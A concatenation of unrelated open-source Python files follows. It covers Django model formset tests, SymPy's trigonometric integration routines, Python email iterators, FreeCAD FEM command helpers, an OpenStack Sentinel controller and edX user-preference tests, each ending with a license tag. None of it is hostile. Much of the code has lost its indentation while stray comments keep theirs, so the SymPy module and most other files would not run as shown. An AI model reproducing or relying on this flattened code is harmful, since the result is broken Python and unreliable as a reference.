'owner_set-0-name': 'Joe Perry',
'owner_set-1-auto_id': '',
'owner_set-1-name': 'Jack Berry',
'owner_set-2-auto_id': '',
'owner_set-2-name': '',
}
formset = FormSet(data, instance=place)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
owner2, = saved
self.assertEqual(owner2.name, 'Jack Berry')
self.assertEqual(owner2.place.name, 'Giordanos')
        # Ensure a custom primary key that is a ForeignKey or OneToOneField gets rendered for the user to choose.
FormSet = modelformset_factory(OwnerProfile)
formset = FormSet()
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-owner">Owner:</label> <select name="form-0-owner" id="id_form-0-owner">\n'
'<option value="" selected="selected">---------</option>\n'
'<option value="%d">Joe Perry at Giordanos</option>\n'
'<option value="%d">Jack Berry at Giordanos</option>\n'
'</select></p>\n'
'<p><label for="id_form-0-age">Age:</label> <input type="text" name="form-0-age" id="id_form-0-age" /></p>'
% (owner1.auto_id, owner2.auto_id))
owner1 = Owner.objects.get(name='Joe Perry')
FormSet = inlineformset_factory(Owner, OwnerProfile, max_num=1, can_delete=False)
self.assertEqual(FormSet.max_num, 1)
formset = FormSet(instance=owner1)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_ownerprofile-0-age">Age:</label> <input type="text" name="ownerprofile-0-age" id="id_ownerprofile-0-age" /><input type="hidden" name="ownerprofile-0-owner" value="%d" id="id_ownerprofile-0-owner" /></p>'
% owner1.auto_id)
data = {
'ownerprofile-TOTAL_FORMS': '1',
'ownerprofile-INITIAL_FORMS': '0',
'ownerprofile-MAX_NUM_FORMS': '1',
'ownerprofile-0-owner': '',
'ownerprofile-0-age': '54',
}
formset = FormSet(data, instance=owner1)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
profile1, = saved
self.assertEqual(profile1.owner, owner1)
self.assertEqual(profile1.age, 54)
formset = FormSet(instance=owner1)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_ownerprofile-0-age">Age:</label> <input type="text" name="ownerprofile-0-age" value="54" id="id_ownerprofile-0-age" /><input type="hidden" name="ownerprofile-0-owner" value="%d" id="id_ownerprofile-0-owner" /></p>'
% owner1.auto_id)
data = {
'ownerprofile-TOTAL_FORMS': '1',
'ownerprofile-INITIAL_FORMS': '1',
'ownerprofile-MAX_NUM_FORMS': '1',
'ownerprofile-0-owner': six.text_type(owner1.auto_id),
'ownerprofile-0-age': '55',
}
formset = FormSet(data, instance=owner1)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
profile1, = saved
self.assertEqual(profile1.owner, owner1)
self.assertEqual(profile1.age, 55)
def test_unique_true_enforces_max_num_one(self):
# ForeignKey with unique=True should enforce max_num=1
place = Place.objects.create(pk=1, name='Giordanos', city='Chicago')
FormSet = inlineformset_factory(Place, Location, can_delete=False)
self.assertEqual(FormSet.max_num, 1)
formset = FormSet(instance=place)
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_location_set-0-lat">Lat:</label> <input id="id_location_set-0-lat" type="text" name="location_set-0-lat" maxlength="100" /></p>\n'
'<p><label for="id_location_set-0-lon">Lon:</label> <input id="id_location_set-0-lon" type="text" name="location_set-0-lon" maxlength="100" /><input type="hidden" name="location_set-0-place" value="1" id="id_location_set-0-place" /><input type="hidden" name="location_set-0-id" id="id_location_set-0-id" /></p>')
def test_foreign_keys_in_parents(self):
self.assertEqual(type(_get_foreign_key(Restaurant, Owner)), models.ForeignKey)
self.assertEqual(type(_get_foreign_key(MexicanRestaurant, Owner)), models.ForeignKey)
def test_unique_validation(self):
FormSet = modelformset_factory(Product, extra=1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'car-red',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
product1, = saved
self.assertEqual(product1.slug, 'car-red')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'car-red',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'slug': ['Product with this Slug already exists.']}])
def test_unique_together_validation(self):
FormSet = modelformset_factory(Price, extra=1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '12.00',
'form-0-quantity': '1',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
price1, = saved
self.assertEqual(price1.price, Decimal('12.00'))
self.assertEqual(price1.quantity, 1)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '12.00',
'form-0-quantity': '1',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'__all__': ['Price with this Price and Quantity already exists.']}])
def test_unique_together_with_inlineformset_factory(self):
# Also see bug #8882.
repository = Repository.objects.create(name='Test Repo')
FormSet = inlineformset_factory(Repository, Revision, extra=1)
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
revision1, = saved
self.assertEqual(revision1.repository, repository)
self.assertEqual(revision1.revision, '146239817507f148d448db38840db7c3cbf47c76')
        # Attempt to save the same revision against the same repo.
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertFalse(formset.is_valid())
self.assertEqual(formset.errors, [{'__all__': ['Revision with this Repository and Revision already exists.']}])
        # unique_together validation with inlineformset_factory and overridden form fields
        # Also see #9494
FormSet = inlineformset_factory(Repository, Revision, fields=('revision',), extra=1)
data = {
'revision_set-TOTAL_FORMS': '1',
'revision_set-INITIAL_FORMS': '0',
'revision_set-MAX_NUM_FORMS': '',
'revision_set-0-repository': repository.pk,
'revision_set-0-revision': '146239817507f148d448db38840db7c3cbf47c76',
'revision_set-0-DELETE': '',
}
formset = FormSet(data, instance=repository)
self.assertFalse(formset.is_valid())
def test_callable_defaults(self):
# Use of callable defaults (see bug #7975).
person = Person.objects.create(name='Ringo')
FormSet = inlineformset_factory(Person, Membership, can_delete=False, extra=1)
formset = FormSet(instance=person)
        # Django renders a hidden field for model fields that have a callable
        # default. This is required so the value can be checked for changes
        # correctly when determining which extra forms have changed and need to be saved.
self.assertEqual(len(formset.forms), 1) # this formset only has one form
form = formset.forms[0]
now = form.fields['date_joined'].initial()
result = form.as_p()
result = re.sub(r'\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}(?:\.\d+)?', '__DATETIME__', result)
self.assertHTMLEqual(result,
'<p><label for="id_membership_set-0-date_joined">Date joined:</label> <input type="text" name="membership_set-0-date_joined" value="__DATETIME__" id="id_membership_set-0-date_joined" /><input type="hidden" name="initial-membership_set-0-date_joined" value="__DATETIME__" id="initial-membership_set-0-id_membership_set-0-date_joined" /></p>\n'
'<p><label for="id_membership_set-0-karma">Karma:</label> <input type="text" name="membership_set-0-karma" id="id_membership_set-0-karma" /><input type="hidden" name="membership_set-0-person" value="%d" id="id_membership_set-0-person" /><input type="hidden" name="membership_set-0-id" id="id_membership_set-0-id" /></p>'
% person.id)
        # Test validation with callable defaults. Validation relies on the hidden initial fields.
data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(data, instance=person)
self.assertTrue(formset.is_valid())
# now test for when the data changes
one_day_later = now + datetime.timedelta(days=1)
filled_data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined': six.text_type(one_day_later.strftime('%Y-%m-%d %H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(filled_data, instance=person)
self.assertFalse(formset.is_valid())
# now test with split datetime fields
class MembershipForm(forms.ModelForm):
date_joined = forms.SplitDateTimeField(initial=now)
class Meta:
model = Membership
def __init__(self, **kwargs):
super(MembershipForm, self).__init__(**kwargs)
self.fields['date_joined'].widget = forms.SplitDateTimeWidget()
FormSet = inlineformset_factory(Person, Membership, form=MembershipForm, can_delete=False, extra=1)
data = {
'membership_set-TOTAL_FORMS': '1',
'membership_set-INITIAL_FORMS': '0',
'membership_set-MAX_NUM_FORMS': '',
'membership_set-0-date_joined_0': six.text_type(now.strftime('%Y-%m-%d')),
'membership_set-0-date_joined_1': six.text_type(now.strftime('%H:%M:%S')),
'initial-membership_set-0-date_joined': six.text_type(now.strftime('%Y-%m-%d %H:%M:%S')),
'membership_set-0-karma': '',
}
formset = FormSet(data, instance=person)
self.assertTrue(formset.is_valid())
def test_inlineformset_factory_with_null_fk(self):
        # inlineformset_factory tests with fk having null=True. See #9462.
        # Create some data that will exhibit the issue.
team = Team.objects.create(name="Red Vipers")
Player(name="Timmy").save()
Player(name="Bobby", team=team).save()
PlayerInlineFormSet = inlineformset_factory(Team, Player)
formset = PlayerInlineFormSet()
self.assertQuerysetEqual(formset.get_queryset(), [])
formset = PlayerInlineFormSet(instance=team)
players = formset.get_queryset()
self.assertEqual(len(players), 1)
player1, = players
self.assertEqual(player1.team, team)
self.assertEqual(player1.name, 'Bobby')
def test_model_formset_with_custom_pk(self):
        # A formset for a model that has a custom primary key; the pk field still
        # needs to be added to the formset automatically.
FormSet = modelformset_factory(ClassyMexicanRestaurant, fields=["tacos_are_yummy"])
self.assertEqual(sorted(FormSet().forms[0].fields.keys()), ['restaurant', 'tacos_are_yummy'])
def test_prevent_duplicates_from_with_the_same_formset(self):
FormSet = modelformset_factory(Product, extra=2)
data = {
'form-TOTAL_FORMS': 2,
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': '',
'form-0-slug': 'red_car',
'form-1-slug': 'red_car',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for slug.'])
FormSet = modelformset_factory(Price, extra=2)
data = {
'form-TOTAL_FORMS': 2,
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': '',
'form-0-price': '25',
'form-0-quantity': '7',
'form-1-price': '25',
'form-1-quantity': '7',
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for price and quantity, which must be unique.'])
        # Only the price field is specified; this should skip any unique checks
        # since the unique_together constraint is not fulfilled. This will fail with a KeyError if broken.
FormSet = modelformset_factory(Price, fields=("price",), extra=2)
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-price': '24',
'form-1-price': '24',
}
formset = FormSet(data)
self.assertTrue(formset.is_valid())
FormSet = inlineformset_factory(Author, Book, extra=0)
author = Author.objects.create(pk=1, name='Charles Baudelaire')
book1 = Book.objects.create(pk=1, author=author, title='Les Paradis Artificiels')
book2 = Book.objects.create(pk=2, author=author, title='Les Fleurs du Mal')
book3 = Book.objects.create(pk=3, author=author, title='Flowers of Evil')
book_ids = author.book_set.order_by('id').values_list('id', flat=True)
data = {
'book_set-TOTAL_FORMS': '2',
'book_set-INITIAL_FORMS': '2',
'book_set-MAX_NUM_FORMS': '',
'book_set-0-title': 'The 2008 Election',
'book_set-0-author': str(author.id),
'book_set-0-id': str(book_ids[0]),
'book_set-1-title': 'The 2008 Election',
'book_set-1-author': str(author.id),
'book_set-1-id': str(book_ids[1]),
}
formset = FormSet(data=data, instance=author)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for title.'])
self.assertEqual(formset.errors,
[{}, {'__all__': ['Please correct the duplicate values below.']}])
FormSet = modelformset_factory(Post, extra=2)
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'blah',
'form-0-slug': 'Morning',
'form-0-subtitle': 'foo',
'form-0-posted': '2009-01-01',
'form-1-title': 'blah',
'form-1-slug': 'Morning in Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-01-01'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for title which must be unique for the date in posted.'])
self.assertEqual(formset.errors,
[{}, {'__all__': ['Please correct the duplicate values below.']}])
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'foo',
'form-0-slug': 'Morning in Prague',
'form-0-subtitle': 'foo',
'form-0-posted': '2009-01-01',
'form-1-title': 'blah',
'form-1-slug': 'Morning in Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-08-02'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for slug which must be unique for the year in posted.'])
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '',
'form-0-title': 'foo',
'form-0-slug': 'Morning in Prague',
'form-0-subtitle': 'rawr',
'form-0-posted': '2008-08-01',
'form-1-title': 'blah',
'form-1-slug': 'Prague',
'form-1-subtitle': 'rawr',
'form-1-posted': '2009-08-02'
}
formset = FormSet(data)
self.assertFalse(formset.is_valid())
self.assertEqual(formset._non_form_errors,
['Please correct the duplicate data for subtitle which must be unique for the month in posted.'])
| agpl-3.0 |
hargup/sympy | sympy/integrals/trigonometry.py | 83 | 10631 | # -*- coding: utf-8 -*-
from __future__ import print_function, division
from sympy.core.compatibility import range
from sympy.core import cacheit, Dummy, Eq, Integer, Rational, S, Wild
from sympy.functions import binomial, sin, cos, Piecewise
# TODO sin(a*x)*cos(b*x) -> sin((a+b)x) + sin((a-b)x) ?
# creating, each time, Wild's and sin/cos/Mul is expensive. Also, our match &
# subs are very slow when not cached, and if we create Wild each time, we
# effectively block caching.
#
# so we cache the pattern
# need to use a function instead of a lambda since the hash of a lambda changes on
# each call to _pat_sincos
def _integer_instance(n):
    return isinstance(n, Integer)
@cacheit
def _pat_sincos(x):
a = Wild('a', exclude=[x])
n, m = [Wild(s, exclude=[x], properties=[_integer_instance])
for s in 'nm']
pat = sin(a*x)**n * cos(a*x)**m
return pat, a, n, m
_u = Dummy('u')
def trigintegrate(f, x, conds='piecewise'):
"""Integrate f = Mul(trig) over x
>>> from sympy import Symbol, sin, cos, tan, sec, csc, cot
>>> from sympy.integrals.trigonometry import trigintegrate
>>> from sympy.abc import x
>>> trigintegrate(sin(x)*cos(x), x)
sin(x)**2/2
>>> trigintegrate(sin(x)**2, x)
x/2 - sin(x)*cos(x)/2
>>> trigintegrate(tan(x)*sec(x), x)
1/cos(x)
>>> trigintegrate(sin(x)*tan(x), x)
-log(sin(x) - 1)/2 + log(sin(x) + 1)/2 - sin(x)
http://en.wikibooks.org/wiki/Calculus/Integration_techniques
See Also
========
sympy.integrals.integrals.Integral.doit
sympy.integrals.integrals.Integral
"""
from sympy.integrals.integrals import integrate
pat, a, n, m = _pat_sincos(x)
f = f.rewrite('sincos')
M = f.match(pat)
if M is None:
return
n, m = M[n], M[m]
if n is S.Zero and m is S.Zero:
return x
zz = x if n is S.Zero else S.Zero
a = M[a]
if n.is_odd or m.is_odd:
u = _u
n_, m_ = n.is_odd, m.is_odd
# take smallest n or m -- to choose simplest substitution
if n_ and m_:
n_ = n_ and (n < m) # NB: careful here, one of the
m_ = m_ and not (n < m) # conditions *must* be true
# n m u=C (n-1)/2 m
# S(x) * C(x) dx --> -(1-u^2) * u du
if n_:
ff = -(1 - u**2)**((n - 1)/2) * u**m
uu = cos(a*x)
# n m u=S n (m-1)/2
# S(x) * C(x) dx --> u * (1-u^2) du
elif m_:
ff = u**n * (1 - u**2)**((m - 1)/2)
uu = sin(a*x)
fi = integrate(ff, u) # XXX cyclic deps
fx = fi.subs(u, uu)
if conds == 'piecewise':
return Piecewise((zz, Eq(a, 0)), (fx / a, True))
return fx / a
# n & m are both even
#
# 2k 2m 2l 2l
# we transform S (x) * C (x) into terms with only S (x) or C (x)
#
# example:
# 100 4 100 2 2 100 4 2
# S (x) * C (x) = S (x) * (1-S (x)) = S (x) * (1 + S (x) - 2*S (x))
#
# 104 102 100
# = S (x) - 2*S (x) + S (x)
# 2k
# then S is integrated with recursive formula
# take largest n or m -- to choose simplest substitution
n_ = (abs(n) > abs(m))
m_ = (abs(m) > abs(n))
res = S.Zero
if n_:
# 2k 2 k i 2i
# C = (1 - S ) = sum(i, (-) * B(k, i) * S )
if m > 0:
for i in range(0, m//2 + 1):
res += ((-1)**i * binomial(m//2, i) *
_sin_pow_integrate(n + 2*i, x))
elif m == 0:
res = _sin_pow_integrate(n, x)
else:
# m < 0 , |n| > |m|
# /
# |
# | m n
# | cos (x) sin (x) dx =
# |
# |
#/
# /
# |
# -1 m+1 n-1 n - 1 | m+2 n-2
# ________ cos (x) sin (x) + _______ | cos (x) sin (x) dx
# |
# m + 1 m + 1 |
# /
res = (Rational(-1, m + 1) * cos(x)**(m + 1) * sin(x)**(n - 1) +
Rational(n - 1, m + 1) *
trigintegrate(cos(x)**(m + 2)*sin(x)**(n - 2), x))
elif m_:
# 2k 2 k i 2i
# S = (1 - C ) = sum(i, (-) * B(k, i) * C )
if n > 0:
# / /
# | |
# | m n | -m n
# | cos (x)*sin (x) dx or | cos (x) * sin (x) dx
# | |
# / /
#
# |m| > |n| ; m, n >0 ; m, n belong to Z - {0}
# n 2
# sin (x) term is expanded here in terms of cos (x),
# and then integrated.
#
for i in range(0, n//2 + 1):
res += ((-1)**i * binomial(n//2, i) *
_cos_pow_integrate(m + 2*i, x))
elif n == 0:
# /
# |
# | 1
# | _ _ _
# | m
# | cos (x)
# /
#
res = _cos_pow_integrate(m, x)
else:
# n < 0 , |m| > |n|
# /
# |
# | m n
# | cos (x) sin (x) dx =
# |
# |
#/
# /
# |
# 1 m-1 n+1 m - 1 | m-2 n+2
# _______ cos (x) sin (x) + _______ | cos (x) sin (x) dx
# |
# n + 1 n + 1 |
# /
res = (Rational(1, n + 1) * cos(x)**(m - 1)*sin(x)**(n + 1) +
Rational(m - 1, n + 1) *
trigintegrate(cos(x)**(m - 2)*sin(x)**(n + 2), x))
else:
if m == n:
##Substitute sin(2x)/2 for sin(x)cos(x) and then Integrate.
res = integrate((Rational(1, 2)*sin(2*x))**m, x)
elif (m == -n):
if n < 0:
# Same as the scheme described above.
                # The function argument to integrate will eventually be 1,
                # which cannot be integrated by trigintegrate.
                # Hence use sympy.integrals.integrate.
res = (Rational(1, n + 1) * cos(x)**(m - 1) * sin(x)**(n + 1) +
Rational(m - 1, n + 1) *
integrate(cos(x)**(m - 2) * sin(x)**(n + 2), x))
else:
res = (Rational(-1, m + 1) * cos(x)**(m + 1) * sin(x)**(n - 1) +
Rational(n - 1, m + 1) *
integrate(cos(x)**(m + 2)*sin(x)**(n - 2), x))
if conds == 'piecewise':
return Piecewise((zz, Eq(a, 0)), (res.subs(x, a*x) / a, True))
return res.subs(x, a*x) / a
def _sin_pow_integrate(n, x):
if n > 0:
if n == 1:
#Recursion break
return -cos(x)
# n > 0
# / /
# | |
# | n -1 n-1 n - 1 | n-2
# | sin (x) dx = ______ cos (x) sin (x) + _______ | sin (x) dx
# | |
# | n n |
#/ /
#
#
return (Rational(-1, n) * cos(x) * sin(x)**(n - 1) +
Rational(n - 1, n) * _sin_pow_integrate(n - 2, x))
if n < 0:
if n == -1:
##Make sure this does not come back here again.
##Recursion breaks here or at n==0.
return trigintegrate(1/sin(x), x)
# n < 0
# / /
# | |
# | n 1 n+1 n + 2 | n+2
# | sin (x) dx = _______ cos (x) sin (x) + _______ | sin (x) dx
# | |
# | n + 1 n + 1 |
#/ /
#
return (Rational(1, n + 1) * cos(x) * sin(x)**(n + 1) +
Rational(n + 2, n + 1) * _sin_pow_integrate(n + 2, x))
else:
#n == 0
#Recursion break.
return x
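# Illustrative note (added for clarity, not part of the original module): for a
# concrete even power the recursion above unwinds as, e.g.,
#   _sin_pow_integrate(4, x)
#     = -cos(x)*sin(x)**3/4 + 3/4 * _sin_pow_integrate(2, x)
#     = -cos(x)*sin(x)**3/4 - 3*cos(x)*sin(x)/8 + 3*x/8
# which matches the standard reduction formula for integrating sin(x)**n;
# the exact ordering of terms in the returned expression may differ.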
def _cos_pow_integrate(n, x):
if n > 0:
if n == 1:
#Recursion break.
return sin(x)
# n > 0
# / /
# | |
# | n 1 n-1 n - 1 | n-2
# | sin (x) dx = ______ sin (x) cos (x) + _______ | cos (x) dx
# | |
# | n n |
#/ /
#
return (Rational(1, n) * sin(x) * cos(x)**(n - 1) +
Rational(n - 1, n) * _cos_pow_integrate(n - 2, x))
if n < 0:
if n == -1:
##Recursion break
return trigintegrate(1/cos(x), x)
# n < 0
# / /
# | |
# | n -1 n+1 n + 2 | n+2
# | cos (x) dx = _______ sin (x) cos (x) + _______ | cos (x) dx
# | |
# | n + 1 n + 1 |
#/ /
#
return (Rational(-1, n + 1) * sin(x) * cos(x)**(n + 1) +
Rational(n + 2, n + 1) * _cos_pow_integrate(n + 2, x))
else:
# n == 0
#Recursion Break.
return x
| bsd-3-clause |
buqing2009/MissionPlanner | Lib/email/iterators.py | 68 | 2275 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: [email protected]
"""Various types of useful iterators and generators."""
__all__ = [
'body_line_iterator',
'typed_subpart_iterator',
'walk',
# Do not include _structure() since it's part of the debugging API.
]
import sys
from cStringIO import StringIO
# This function will become a method of the Message class
def walk(self):
"""Walk over the message tree, yielding each subpart.
The walk is performed in depth-first order. This method is a
generator.
"""
yield self
if self.is_multipart():
for subpart in self.get_payload():
for subsubpart in subpart.walk():
yield subsubpart
# These two functions are imported into the Iterators.py interface module.
def body_line_iterator(msg, decode=False):
"""Iterate over the parts, returning string payloads line-by-line.
Optional decode (default False) is passed through to .get_payload().
"""
for subpart in msg.walk():
payload = subpart.get_payload(decode=decode)
if isinstance(payload, basestring):
for line in StringIO(payload):
yield line
def typed_subpart_iterator(msg, maintype='text', subtype=None):
"""Iterate over the subparts with a given MIME type.
Use `maintype' as the main MIME type to match against; this defaults to
"text". Optional `subtype' is the MIME subtype to match against; if
omitted, only the main type is matched.
"""
for subpart in msg.walk():
if subpart.get_content_maintype() == maintype:
if subtype is None or subpart.get_content_subtype() == subtype:
yield subpart
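# Minimal usage sketch (illustrative only; the message construction below is a
# made-up example, not taken from this module):
#
# from email.mime.multipart import MIMEMultipart
# from email.mime.text import MIMEText
# msg = MIMEMultipart()
# msg.attach(MIMEText('hello', 'plain'))
# msg.attach(MIMEText('<b>hello</b>', 'html'))
# for part in typed_subpart_iterator(msg, 'text', 'plain'):
#     print part.get_payload()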
def _structure(msg, fp=None, level=0, include_default=False):
"""A handy debugging aid"""
if fp is None:
fp = sys.stdout
tab = ' ' * (level * 4)
print >> fp, tab + msg.get_content_type(),
if include_default:
print >> fp, '[%s]' % msg.get_default_type()
else:
print >> fp
if msg.is_multipart():
for subpart in msg.get_payload():
_structure(subpart, fp, level+1, include_default)
| gpl-3.0 |
maurerpe/FreeCAD | src/Mod/Fem/FemCommands.py | 3 | 6302 | #***************************************************************************
#* *
#* Copyright (c) 2015 - FreeCAD Developers *
#* Author (c) 2015 - Przemo Fiszt < [email protected]> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
__title__ = "Fem Commands"
__author__ = "Przemo Firszt"
__url__ = "http://www.freecadweb.org"
import FreeCAD
if FreeCAD.GuiUp:
import FreeCADGui
import FemGui
from PySide import QtCore
class FemCommands(object):
def __init__(self):
self.resources = {'Pixmap': 'fem-frequency-analysis',
'MenuText': QtCore.QT_TRANSLATE_NOOP("Fem_Command", "Default Fem Command MenuText"),
'Accel': "",
'ToolTip': QtCore.QT_TRANSLATE_NOOP("Fem_Command", "Default Fem Command ToolTip")}
#FIXME add option description
self.is_active = None
def GetResources(self):
return self.resources
def IsActive(self):
if not self.is_active:
active = False
elif self.is_active == 'with_document':
active = FreeCADGui.ActiveDocument is not None
elif self.is_active == 'with_analysis':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc()
elif self.is_active == 'with_results':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and self.results_present()
elif self.is_active == 'with_part_feature':
active = FreeCADGui.ActiveDocument is not None and self.part_feature_selected()
elif self.is_active == 'with_solver':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and self.solver_selected()
elif self.is_active == 'with_analysis_without_solver':
active = FemGui.getActiveAnalysis() is not None and self.active_analysis_in_active_doc() and not self.analysis_has_solver()
return active
def results_present(self):
results = False
analysis_members = FemGui.getActiveAnalysis().Member
for o in analysis_members:
if o.isDerivedFrom('Fem::FemResultObject'):
results = True
return results
def part_feature_selected(self):
sel = FreeCADGui.Selection.getSelection()
if len(sel) == 1 and sel[0].isDerivedFrom("Part::Feature"):
return True
else:
return False
def active_analysis_in_active_doc(self):
return FemGui.getActiveAnalysis().Document is FreeCAD.ActiveDocument
def solver_selected(self):
sel = FreeCADGui.Selection.getSelection()
if len(sel) == 1 and sel[0].isDerivedFrom("Fem::FemSolverObjectPython"):
return True
else:
return False
def analysis_has_solver(self):
solver = False
analysis_members = FemGui.getActiveAnalysis().Member
for o in analysis_members:
if o.isDerivedFrom("Fem::FemSolverObjectPython"):
solver = True
if solver is True:
return True
else:
return False
def hide_parts_constraints_show_meshes(self):
if FreeCAD.GuiUp:
for acnstrmesh in FemGui.getActiveAnalysis().Member:
#if "Constraint" in acnstrmesh.TypeId:
# acnstrmesh.ViewObject.Visibility = False
if "Mesh" in acnstrmesh.TypeId:
aparttoshow = acnstrmesh.Name.replace("_Mesh", "")
for apart in FreeCAD.activeDocument().Objects:
if aparttoshow == apart.Name:
apart.ViewObject.Visibility = False
acnstrmesh.ViewObject.Visibility = True # OvG: Hide constraints and parts and show meshes
def hide_meshes_show_parts_constraints(self):
if FreeCAD.GuiUp:
for acnstrmesh in FemGui.getActiveAnalysis().Member:
if "Constraint" in acnstrmesh.TypeId:
acnstrmesh.ViewObject.Visibility = True
if "Mesh" in acnstrmesh.TypeId:
aparttoshow = acnstrmesh.Name.replace("_Mesh", "")
for apart in FreeCAD.activeDocument().Objects:
if aparttoshow == apart.Name:
apart.ViewObject.Visibility = True
acnstrmesh.ViewObject.Visibility = False # OvG: Hide meshes and show constraints and meshed part e.g. on purging results
| lgpl-2.1 |
spjmurray/openstack-sentinel | sentinel/api/controllers/network/v2/floatingips.py | 1 | 1120 | # Copyright 2017 DataCentred Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pecan
import pecan.decorators
from sentinel.api.controllers.base import BaseController
from sentinel.scope import Scope
class NetworkV2FloatingipsController(BaseController):
service = u'network'
resource = u'floatingip'
collection = u'floatingips'
@pecan.expose('json')
@pecan.decorators.accept_noncanonical
def get_all(self):
floatingips = Scope.filter(self.network.list_floatingips())
return self.format_collection(floatingips, links=False)
# vi: ts=4 et:
| apache-2.0 |
xiandiancloud/ji | common/djangoapps/user_api/tests/test_models.py | 52 | 1757 | from django.db import IntegrityError
from django.test import TestCase
from student.tests.factories import UserFactory
from user_api.tests.factories import UserPreferenceFactory
from user_api.models import UserPreference
class UserPreferenceModelTest(TestCase):
def test_duplicate_user_key(self):
user = UserFactory.create()
UserPreferenceFactory.create(user=user, key="testkey", value="first")
self.assertRaises(
IntegrityError,
UserPreferenceFactory.create,
user=user,
key="testkey",
value="second"
)
def test_arbitrary_values(self):
user = UserFactory.create()
UserPreferenceFactory.create(user=user, key="testkey0", value="")
UserPreferenceFactory.create(user=user, key="testkey1", value="This is some English text!")
